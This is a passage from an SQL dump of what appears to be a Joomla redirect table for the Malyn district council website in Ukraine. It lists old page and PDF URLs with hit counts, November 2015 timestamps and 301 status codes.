17:49:46','0000-00-00 00:00:00',301),(17245,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/144-pro-hid-vikonannja-rajonnoi-cilovoi-programi_2','','','',15,0,'2015-11-03 17:50:07','0000-00-00 00:00:00',301),(17246,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/146-pro-peredachu-kotelni','','','',14,0,'2015-11-03 17:50:08','0000-00-00 00:00:00',301),(17247,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/229-pro-vnesennja-i-zatverdzhennja-zmin-do-statutu','','','',13,0,'2015-11-03 17:50:10','0000-00-00 00:00:00',301),(17248,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/232-pro-formuvannja-statutnih-fondiv-pidpriemstv-shho','','','',11,0,'2015-11-03 17:50:11','0000-00-00 00:00:00',301),(17249,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/60-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_2','','','',13,0,'2015-11-03 17:50:31','0000-00-00 00:00:00',301),(17250,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/93-pro-zatverdzhennja-cilovoi-rajonnoi-programi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-03 17:50:34','0000-00-00 00:00:00',301),(17251,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/421-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_10?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-03 17:50:37','0000-00-00 00:00:00',301),(17252,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/430-pro-programu-zabezpechennja-deputatskoi-dijalnosti_2?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-03 17:50:39','0000-00-00 00:00:00',301),(17253,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/342-pro-zatverdzhennja-polozhennja-pro-teritorialnij?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-03 17:50:41','0000-00-00 00:00:00',301),(17254,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/348-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_8?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-03 17:50:42','0000-00-00 00:00:00',301),(17255,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/351-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_5?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-03 17:50:43','0000-00-00 00:00:00',301),(17256,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/352-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_6?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-03 17:50:45','0000-00-00 00:00:00',301),(17257,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/598-pro-pogodzhennja-priznachennja-na-posadu-direktora_3?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-03 17:50:46','0000-00-00 00:00:00',301),(17258,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/69-rishennya-vid-26-11-2014-roku','','','',3,0,'2015-11-03 17:51:14','0000-00-00 00:00:00',301),(17259,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/912-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 17:51:18','0000-00-00 00:00:00',301),(17260,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=330:2011-05-20-16-28-08&catid=33&Itemid=66&lang=uk','','','',2,0,'2015-11-03 17:56:26','0000-00-00 00:00:00',301),(17261,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=773:2012-10-02-06-48-57&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-03 18:53:13','0000-00-00 00:00:00',301),(17262,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=808:2012-10-30-13-56-37&lang=ru&option=com_content&view=article','','','',5,0,'2015-11-03 18:53:14','0000-00-00 00:00:00',301),(17263,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1376:2014-08-22-08-01-53&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-03 18:53:14','0000-00-00 00:00:00',301),(17264,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/69-rishennya-vid-26-11-2014-roku/927-pro-spisannya-osnovnikh-zasobiv','','','',1,0,'2015-11-03 18:53:32','0000-00-00 00:00:00',301),(17265,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=762:-210-&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-03 19:17:50','0000-00-00 00:00:00',301),(17266,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1321:------------------lr-&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-03 19:17:50','0000-00-00 00:00:00',301),(17267,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-?start=7','','','',3,0,'2015-11-03 19:19:05','0000-00-00 00:00:00',301),(17268,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1078-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-novovorob-jivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-03 19:21:55','0000-00-00 00:00:00',301),(17269,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1087-pro-plan-roboti-rajonnoji-radi-na-ii-pivrichchya-2015-roku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-03 19:33:48','0000-00-00 00:00:00',301),(17270,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1089-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-03 19:34:01','0000-00-00 00:00:00',301),(17271,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1090-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-03 19:34:12','0000-00-00 00:00:00',301),(17272,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1093-pro-perspektivi-aministrativno-teritorialnoji-reformi-vidpovidno-do-zakonu-ukrajini-pro-dobrovilne-ob-ednannya-teritorialnikh-gromad','','','',15,0,'2015-11-03 19:34:14','0000-00-00 00:00:00',301),(17273,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1093-pro-perspektivi-aministrativno-teritorialnoji-reformi-vidpovidno-do-zakonu-ukrajini-pro-dobrovilne-ob-ednannya-teritorialnikh-gromad?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-03 19:34:19','0000-00-00 00:00:00',301),(17274,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1095-pro-zatverdzhennya-rezultativ-auktsionnikh-torgiv-z-prodazhu-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-03 19:34:54','0000-00-00 00:00:00',301),(17275,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1096-pro-peredachu-primishchennya-gorinskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-gorinskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-03 19:34:58','0000-00-00 00:00:00',301),(17276,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1097-pro-khid-vikonannya-rajonnoji-programi-rozvitku-agropromislovogo-kompleksu-malinskogo-rajonu-na-2011-2015-roki-ta-pidsumki-vesnyano-polovikh-robit','','','',12,0,'2015-11-03 19:35:01','0000-00-00 00:00:00',301),(17277,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1161-pro-zatverdzhennya-rajonnoji-programi-zabezpechennya-provedennya-protiepizootichnikh-zakhodiv-u-malinskomu-rajoni-na-2015-2017-roki?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-03 19:35:17','0000-00-00 00:00:00',301),(17278,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1163-pro-peredachu-primishchennya-lyubovitskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-lyubovitskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-03 19:35:22','0000-00-00 00:00:00',301),(17280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51:--19072013-&layout=blog&Itemid=92&lang=ru','','','',10,0,'2015-11-03 19:45:26','0000-00-00 00:00:00',301),(17281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46:--21122012&layout=blog&Itemid=85&lang=uk&limitstart=5','','','',5,0,'2015-11-03 19:45:49','0000-00-00 00:00:00',301),(17282,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=317:-l-2008-2012-r&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-03 19:56:45','0000-00-00 00:00:00',301),(17283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=uk','','','',19,0,'2015-11-03 20:04:19','0000-00-00 00:00:00',301),(17285,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-?start=20','','','',5,0,'2015-11-03 20:12:19','0000-00-00 00:00:00',301),(17286,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=37:--21102011-&layout=blog&Itemid=72&lang=uk','','','',6,0,'2015-11-03 20:12:42','0000-00-00 00:00:00',301),(17288,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=453:-lr-90-&catid=11&Itemid=14&lang=uk','','','',5,0,'2015-11-03 20:45:39','0000-00-00 00:00:00',301),(17289,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku','','','',34,0,'2015-11-03 21:07:34','0000-00-00 00:00:00',301),(17290,'http://malyn-rayrada.org.ua/attachments/004_history malyn region1.PDF','','','',3,0,'2015-11-03 21:39:28','0000-00-00 00:00:00',301),(17292,'http://www.malyn-rayrada.org.ua/attachments/006_history malyn region3.PDF','','','',130,0,'2015-11-03 21:52:59','0000-00-00 00:00:00',301),(17293,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=191:2010-12-15-13-27-06&lang=uk&option=com_content&view=article','','','',4,0,'2015-11-03 22:07:02','0000-00-00 00:00:00',301),(17294,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=56:--03022014-&layout=blog&Itemid=97&lang=uk&limitstart=5','','','',5,0,'2015-11-03 22:20:14','0000-00-00 00:00:00',301),(17295,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=242:-----310-&catid=11&Itemid=14&lang=ru','','','',2,0,'2015-11-03 22:31:12','0000-00-00 00:00:00',301),(17296,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=119:2010-09-03-12-42-53&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',2,0,'2015-11-03 22:31:23','0000-00-00 00:00:00',301),(17297,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-?start=14','','','',32,0,'2015-11-03 22:35:37','0000-00-00 00:00:00',301),(17298,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/681-pro-programu-zabezpechennja-deputatskoi-dijalnosti_3','','','',16,0,'2015-11-04 00:16:02','0000-00-00 00:00:00',301),(17299,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/636-pro-stan-zlochinnosti-na-teritorii-malinskogo','','','',8,0,'2015-11-04 01:16:12','0000-00-00 00:00:00',301),(17300,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=314:2011-05-20-13-01-00&catid=33&Itemid=66&lang=uk','','','',9,0,'2015-11-04 01:19:34','0000-00-00 00:00:00',301),(17301,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=411:-2014-&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-04 02:05:06','0000-00-00 00:00:00',301),(17302,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/929-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',7,0,'2015-11-04 03:42:46','0000-00-00 00:00:00',301),(17303,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=uk&layout=blog&limitstart=25&option=com_content&view=category','','','',1,0,'2015-11-04 04:30:25','0000-00-00 00:00:00',301),(17304,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&id=56:--03022014-&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-11-04 05:40:30','0000-00-00 00:00:00',301),(17305,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=193:------------2009-2010-&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-04 06:09:13','0000-00-00 00:00:00',301),(17306,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1144-ukrajinkivska-silska-rada-informue','','','',20,0,'2015-11-04 07:08:36','0000-00-00 00:00:00',301),(17307,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/288-pro-zvit-redaktora-gazeti-malinski-novini-pro','','','',19,0,'2015-11-04 09:34:42','0000-00-00 00:00:00',301),(17308,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku?limitstart=0','','','',15,0,'2015-11-04 09:40:09','0000-00-00 00:00:00',301),(17309,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11&lang=en&Itemid=','','','',3,0,'2015-11-04 09:52:17','0000-00-00 00:00:00',301),(17310,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11&lang=en&Itemid=0','','','',2,0,'2015-11-04 09:56:30','0000-00-00 00:00:00',301),(17312,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/735-pro-skasuvannja-rishen-rajonnoi-radi-vid-25','','','',18,0,'2015-11-04 09:58:08','0000-00-00 00:00:00',301),(17313,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11&lang=ru&Itemid=0','','','',2,0,'2015-11-04 10:04:03','0000-00-00 00:00:00',301),(17314,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=328:2011-05-20-16-23-02&catid=33:-20052011&Itemid=66&lang=uk','','','',23,0,'2015-11-04 10:13:02','0000-00-00 00:00:00',301),(17315,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=55&Itemid=96&lang=ru','','','',12,0,'2015-11-04 10:16:27','0000-00-00 00:00:00',301),(17316,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=ru&limitstart=30','','','',4,0,'2015-11-04 10:19:33','0000-00-00 00:00:00',301),(17317,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=50:--23042013-&layout=blog&Itemid=90&lang=uk','','','',3,0,'2015-11-04 10:22:38','0000-00-00 00:00:00',301),(17318,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=en&limitstart=20','','','',5,0,'2015-11-04 10:24:11','0000-00-00 00:00:00',301),(17319,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=465:-l-r-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-04 10:24:50','0000-00-00 00:00:00',301),(17320,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=68&lang=ru&limitstart=5','','','',4,0,'2015-11-04 10:30:05','0000-00-00 00:00:00',301),(17321,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/238-pro-prijnjattja-u-spilnu-vlasnist-teritorialnih','','','',11,0,'2015-11-04 10:40:37','0000-00-00 00:00:00',301),(17322,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1162-pro-zgodu-na-peredachu-finansovogo-resursu-medichna-subventsiya-dlya-vikonannya-delegovanikh-povnovazhen-po-medichnomu-o','','','',1,0,'2015-11-04 10:40:55','0000-00-00 00:00:00',301),(17323,'http://www.malyn-rayrada.org.ua/index.php/--19122011-/204-pro-zatverdzhennja-programi-zajnjatosti-naselennja','','','',5,0,'2015-11-04 10:41:14','0000-00-00 00:00:00',301),(17324,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=451:-2011-2015-&catid=38&Itemid=73&lang=uk','','','',6,0,'2015-11-04 10:41:28','0000-00-00 00:00:00',301),(17325,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=en&Itemid=0','','','',1,0,'2015-11-04 10:41:32','0000-00-00 00:00:00',301),(17326,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=uk&limitstart=25','','','',7,0,'2015-11-04 10:42:09','0000-00-00 00:00:00',301),(17328,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47:-21022013-&layout=blog&Itemid=86&lang=uk&limitstart=10','','','',4,0,'2015-11-04 10:49:55','0000-00-00 00:00:00',301),(17329,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=596:2012-02-28-12-59-05&catid=40&Itemid=77&lang=en','','','',4,0,'2015-11-04 10:51:27','0000-00-00 00:00:00',301),(17330,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=51:2010-06-16-14-19-01&catid=1&Itemid=10&lang=ru','','','',2,0,'2015-11-04 10:54:51','0000-00-00 00:00:00',301),(17331,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&catid=7&Itemid=12&lang=ru','','','',3,0,'2015-11-04 10:56:24','0000-00-00 00:00:00',301),(17332,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1193-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',15,0,'2015-11-04 10:58:53','0000-00-00 00:00:00',301),(17333,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=827:2012-11-20-17-44-21&catid=11&lang=uk','','','',4,0,'2015-11-04 10:59:30','0000-00-00 00:00:00',301),(17334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=en&limitstart=15','','','',3,0,'2015-11-04 11:06:01','0000-00-00 00:00:00',301),(17335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=uk&limitstart=10','','','',5,0,'2015-11-04 11:08:12','0000-00-00 00:00:00',301),(17336,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=28','','','',34,0,'2015-11-04 11:08:48','0000-00-00 00:00:00',301),(17337,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=452:-20-2011-100-l-r-&catid=38&Itemid=73&lang=en','','','',3,0,'2015-11-04 11:18:10','0000-00-00 00:00:00',301),(17338,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=ru&limitstart=10','','','',5,0,'2015-11-04 11:29:52','0000-00-00 00:00:00',301),(17340,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=uk&Itemid=','','','',5,0,'2015-11-04 11:32:21','0000-00-00 00:00:00',301),(17341,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=428:-2012-&catid=11&lang=ru&Itemid=','','','',8,0,'2015-11-04 11:37:37','0000-00-00 00:00:00',301),(17342,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=ru&limitstart=20','','','',6,0,'2015-11-04 11:38:51','0000-00-00 00:00:00',301),(17343,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=279:2011-03-31-08-20-23&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-04 11:41:10','0000-00-00 00:00:00',301),(17344,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=507:2011-12-19-17-10-52&lang=ru&option=com_content&view=article','','','',5,0,'2015-11-04 11:41:11','0000-00-00 00:00:00',301),(17345,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=819:2012-11-14-16-40-09&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-04 11:41:12','0000-00-00 00:00:00',301),(17346,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/594-pro-zatverdzhennja-rozmiru-vartosti-produktiv_4','','','',19,0,'2015-11-04 11:43:38','0000-00-00 00:00:00',301),(17347,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=174:-9-2010-&catid=11&lang=ru&Itemid=','','','',3,0,'2015-11-04 11:46:36','0000-00-00 00:00:00',301),(17348,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=608:2012-03-15-08-40-03&catid=11&lang=en&Itemid=','','','',7,0,'2015-11-04 11:47:13','0000-00-00 00:00:00',301),(17349,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=164:-6-&catid=11&Itemid=16&lang=en','','','',3,0,'2015-11-04 11:47:50','0000-00-00 00:00:00',301),(17350,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=609:-q-q&catid=11&lang=uk&Itemid=','','','',2,0,'2015-11-04 11:48:09','0000-00-00 00:00:00',301),(17351,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=674:2012-05-14-13-46-26&catid=11&lang=en','','','',3,0,'2015-11-04 11:51:33','0000-00-00 00:00:00',301),(17352,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=674:2012-05-14-13-46-26&catid=11&lang=ru','','','',1,0,'2015-11-04 11:52:11','0000-00-00 00:00:00',301),(17353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1010:-22-6-&catid=11&lang=ru&Itemid=','','','',7,0,'2015-11-04 11:52:48','0000-00-00 00:00:00',301),(17354,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=997:-27-&catid=11&lang=uk&Itemid=','','','',3,0,'2015-11-04 11:56:12','0000-00-00 00:00:00',301),(17356,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=5:-----5-&catid=5:2010-06-05-12-51-34&Itemid=6&lang=en','','','',4,0,'2015-11-04 12:00:32','0000-00-00 00:00:00',301),(17357,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-?start=5','','','',7,0,'2015-11-04 12:05:11','0000-00-00 00:00:00',301),(17358,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=247:---500------lr&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2015-11-04 12:05:31','0000-00-00 00:00:00',301),(17359,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=en','','','',4,0,'2015-11-04 12:09:13','0000-00-00 00:00:00',301),(17360,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=481:--------2012-2015--&catid=36&Itemid=70&lang=ru','','','',5,0,'2015-11-04 12:10:09','0000-00-00 00:00:00',301),(17361,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=600:2012-03-01-06-12-24&catid=11&lang=uk&Itemid=0','','','',5,0,'2015-11-04 12:10:49','0000-00-00 00:00:00',301),(17362,'http://www.malyn-rayrada.org.ua/attachments/article/1122/Зайцева.pdf','','','',6,0,'2015-11-04 12:11:04','0000-00-00 00:00:00',301),(17363,'http://www.malyn-rayrada.org.ua/index.php/--19122011-/245-pro-vstanovlennja-nadbavki-do-posadovogo-okladu','','','',3,0,'2015-11-04 12:12:37','0000-00-00 00:00:00',301),(17364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=en&limitstart=20','','','',3,0,'2015-11-04 12:16:20','0000-00-00 00:00:00',301),(17365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=174:-9-2010-&catid=11&lang=ru&Itemid=0','','','',7,0,'2015-11-04 12:20:22','0000-00-00 00:00:00',301),(17366,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=548:-2011-2015-&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-04 12:20:44','0000-00-00 00:00:00',301),(17367,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1371:2014-08-04-19-11-42&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-04 12:20:44','0000-00-00 00:00:00',301),(17368,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=636:-----------2011-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2015-11-04 12:21:39','0000-00-00 00:00:00',301),(17369,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/927-pro-spisannya-osnovnikh-zasobiv','','','',27,0,'2015-11-04 12:24:17','0000-00-00 00:00:00',301),(17370,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=116:-2010-16-2009-&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',9,0,'2015-11-04 12:43:58','0000-00-00 00:00:00',301),(17371,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/288-pro-zvit-redaktora-gazeti-malinski-novini-pro','','','',7,0,'2015-11-04 12:51:57','0000-00-00 00:00:00',301),(17372,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1058-oprilyudnennya-vydomostej-pro-dokhodi-za-2014-rik-kerivnitstva-ivanivskoji-silskoji-radi','','','',15,0,'2015-11-04 13:00:10','0000-00-00 00:00:00',301),(17373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=201:--------l-r--2011--&catid=29:--15122010-&Itemid=60&lang=ru','','','',20,0,'2015-11-04 13:03:57','0000-00-00 00:00:00',301),(17374,'http://www.malyn-rayrada.org.ua/attachments/article/1122/Захарчук.pdf','','','',5,0,'2015-11-04 13:19:16','0000-00-00 00:00:00',301),(17375,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=428:-2012-&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-04 13:27:15','0000-00-00 00:00:00',301),(17376,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=736:2012-07-18-13-34-35&catid=43:--25072012-&Itemid=82&lang=uk','','','',3,0,'2015-11-04 13:27:21','0000-00-00 00:00:00',301),(17377,'http://www.malyn-rayrada.org.ua/attachments/article/1122/Пустовойтенко.pdf','','','',5,0,'2015-11-04 13:27:38','0000-00-00 00:00:00',301),(17378,'http://www.malyn-rayrada.org.ua/attachments/article/1122/Чапік.pdf','','','',23,0,'2015-11-04 13:27:56','0000-00-00 00:00:00',301),(17379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=68&lang=uk&limitstart=5','','','',4,0,'2015-11-04 13:28:15','0000-00-00 00:00:00',301),(17380,'http://www.malyn-rayrada.org.ua/attachments/article/1195/Діброва(1).pdf','','','',3,0,'2015-11-04 13:28:52','0000-00-00 00:00:00',301),(17381,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/509-pro-vnesennja-zmin-do-strukturi-vikonavchogo','','','',57,0,'2015-11-04 13:31:57','0000-00-00 00:00:00',301),(17382,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/355-pro-skasuvannja-rishennja-rajonnoi-radi-vid-27-04','','','',9,0,'2015-11-04 13:40:10','0000-00-00 00:00:00',301),(17383,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=15&id=860:09&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-04 16:24:03','0000-00-00 00:00:00',301),(17384,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=736:2012-07-18-13-34-35&Itemid=82&lang=ru&option=com_content&view=article','','','',12,0,'2015-11-04 16:58:15','0000-00-00 00:00:00',301),(17385,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&id=42:--16052012-&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-11-04 17:57:56','0000-00-00 00:00:00',301),(17386,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11&lang=en&Itemid=0','','','',3,0,'2015-11-04 18:04:56','0000-00-00 